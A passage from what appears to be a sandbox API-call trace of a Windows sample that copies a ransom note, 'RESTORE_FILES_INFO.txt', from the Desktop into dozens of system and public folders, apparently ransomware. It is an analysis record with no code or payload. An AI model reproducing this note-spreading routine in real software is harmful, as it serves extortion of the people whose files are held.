lpFilePart=0x0) returned 0x25 [0256.289] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x3c [0256.292] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.292] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.292] CoTaskMemFree (pv=0x720748) [0256.292] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.292] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x3f [0256.293] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.293] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.293] CoTaskMemFree (pv=0x720748) [0256.293] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.293] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x3c [0256.293] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x3f [0256.293] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\restore_files_info.txt"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\public\\pictures\\sample pictures\\restore_files_info.txt"), bFailIfExists=0) returned 1 [0256.297] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.297] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.297] CoTaskMemFree (pv=0x720748) [0256.297] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.297] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x39 [0256.298] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.298] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.298] CoTaskMemFree (pv=0x720748) [0256.298] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.298] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x3c [0256.298] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x39 [0256.298] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\restore_files_info.txt"), lpNewFileName="C:\\Users\\Public\\Music\\Sample Music\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\public\\music\\sample music\\restore_files_info.txt"), bFailIfExists=0) returned 1 [0256.300] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.300] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.300] CoTaskMemFree (pv=0x720748) [0256.300] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.300] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x45 [0256.300] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.300] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.300] CoTaskMemFree (pv=0x720748) [0256.300] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.300] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x3c [0256.300] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x45 [0256.300] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\restore_files_info.txt"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\restore_files_info.txt"), bFailIfExists=0) returned 1 [0256.302] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.302] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.302] CoTaskMemFree (pv=0x720748) [0256.302] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.302] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.303] CoTaskMemFree (pv=0x720748) [0256.303] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.303] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x3c [0256.303] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Power Efficiency Diagnostics\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Power Efficiency Diagnostics\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x58 [0256.303] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\restore_files_info.txt"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Power Efficiency Diagnostics\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\power efficiency diagnostics\\restore_files_info.txt"), bFailIfExists=0) returned 1 [0256.305] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.305] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.305] CoTaskMemFree (pv=0x720748) [0256.305] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.305] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x49 [0256.305] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.305] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.305] CoTaskMemFree (pv=0x720748) [0256.305] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.305] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x3c [0256.306] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x49 [0256.306] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\restore_files_info.txt"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\restore_files_info.txt"), bFailIfExists=0) returned 1 [0256.308] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.308] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.308] CoTaskMemFree (pv=0x720748) [0256.308] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.308] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.308] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.308] CoTaskMemFree (pv=0x720748) [0256.308] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.308] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x3c [0256.308] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x54 [0256.308] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\restore_files_info.txt"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\restore_files_info.txt"), bFailIfExists=0) returned 1 [0256.310] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.310] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.310] CoTaskMemFree (pv=0x720748) [0256.310] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.310] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x41 [0256.310] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.310] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.311] CoTaskMemFree (pv=0x720748) [0256.311] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.311] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x3c [0256.311] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x41 [0256.311] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\restore_files_info.txt"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\restore_files_info.txt"), bFailIfExists=0) returned 1 [0256.313] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.313] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.313] CoTaskMemFree (pv=0x720748) [0256.313] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.313] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.313] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.313] CoTaskMemFree (pv=0x720748) [0256.313] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.313] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x3c [0256.313] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x54 [0256.313] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\restore_files_info.txt"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\restore_files_info.txt"), bFailIfExists=0) returned 1 [0256.319] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.319] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.320] CoTaskMemFree (pv=0x720748) [0256.320] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.320] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x5a [0256.320] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.320] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.320] CoTaskMemFree (pv=0x720748) [0256.320] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.320] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x3c [0256.320] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x5a [0256.320] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\restore_files_info.txt"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\restore_files_info.txt"), bFailIfExists=0) returned 1 [0256.322] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.322] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.322] CoTaskMemFree (pv=0x720748) [0256.322] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.322] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.322] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.322] CoTaskMemFree (pv=0x720748) [0256.322] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.322] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x3c [0256.323] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x46 [0256.323] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\restore_files_info.txt"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\restore_files_info.txt"), bFailIfExists=0) returned 1 [0256.324] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.324] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.324] CoTaskMemFree (pv=0x720748) [0256.325] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.325] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x6e [0256.325] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.325] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.325] CoTaskMemFree (pv=0x720748) [0256.325] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.325] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x3c [0256.325] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4b0, lpFilePart=0x0 | out: 